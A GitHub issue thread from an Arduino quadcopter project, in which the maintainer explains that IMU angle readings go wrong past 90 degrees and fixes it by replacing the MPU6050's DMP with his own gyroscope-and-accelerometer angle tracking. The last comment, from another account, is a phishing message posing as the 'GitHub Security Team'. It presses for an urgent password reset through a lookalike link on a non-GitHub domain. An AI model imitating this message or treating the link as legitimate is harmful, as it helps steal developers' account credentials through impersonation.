### ISSUE TITLE
IMU Angle Reading

### ISSUE THREAD

**Issue by MackinnonBuck** [MackinnonBuck/ArduinoQuadopter#1]
Angles reading past 90 degrees can be unreliable.  No issues occur if the quadcopter is always upright.

**Comment by MackinnonBuck** [comment]
To solve this issue, I plan on deprecating the DMP (digital motion processor) programming for the MPU6050.
Two reasons for this:
a.) Allowing the Arduino to track angles based on angular velocity and fine-tuned by acceleration due to gravity will fix the above issue.
b.) Not all IMUs have DMPs, so deprecating the use of the DMP would make using a different IMU much easier (for those who don't want to use the MPU6050 and don't want to make huge software changes).

**Comment by MackinnonBuck** [comment]
Issue has been resolved. I have done as said above.

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
